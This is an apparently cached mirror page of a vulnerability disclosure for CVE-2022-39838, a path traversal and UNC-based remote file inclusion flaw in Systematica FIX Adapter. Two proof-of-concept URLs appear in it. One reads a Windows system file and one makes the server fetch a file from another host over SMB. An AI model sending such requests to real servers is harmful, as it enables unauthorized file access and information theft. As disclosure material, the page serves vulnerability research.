CVE-2022-39838 PoC — Systematic Alpha Management FIX Adapter 路径遍历漏洞

Source

https://github.com/jet-pentest/CVE-2022-39838

Associated Vulnerability

Title:Systematic Alpha Management FIX Adapter 路径遍历漏洞 (CVE-2022-39838)
Description:Systematic Alpha Management FIX Adapter是美国Systematic Alpha Management公司的一个适配器。 Systematic Alpha Management FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017版本存在安全漏洞，该漏洞源于允许通过UNC共享路径名包含远程文件，还允许遍历本地路径名的绝对路径。

Readme

# CVE-2022-39838
## [Suggested description]
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via
a UNC share pathname, and also allows absolute path traversal to local pathnames.

## [Additional Information]
PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt


## [Vulnerability Type]
Incorrect Access Control


## [Vendor of Product]
Systematica


## [Affected Product Code Base]
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)


## [Attack Type]
Remote


## [Impact Information Disclosure]
true


## [Attack Vectors]
Remote user can get access to arbitrary file in the OS via absolute path.
Also remote user can compel vulnerable server to request file from another machine over smb.


## [Discoverer]
Ivashchenko Sergey (Jet Infosystems, jet.su)


## [Reference]
http://systematicalpha.com/company

File Snapshot


 [4.0K]  /data/pocs/6bfd57c86b20e7d178fc96e50bbfca2c43c2f08c
└── [ 971]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!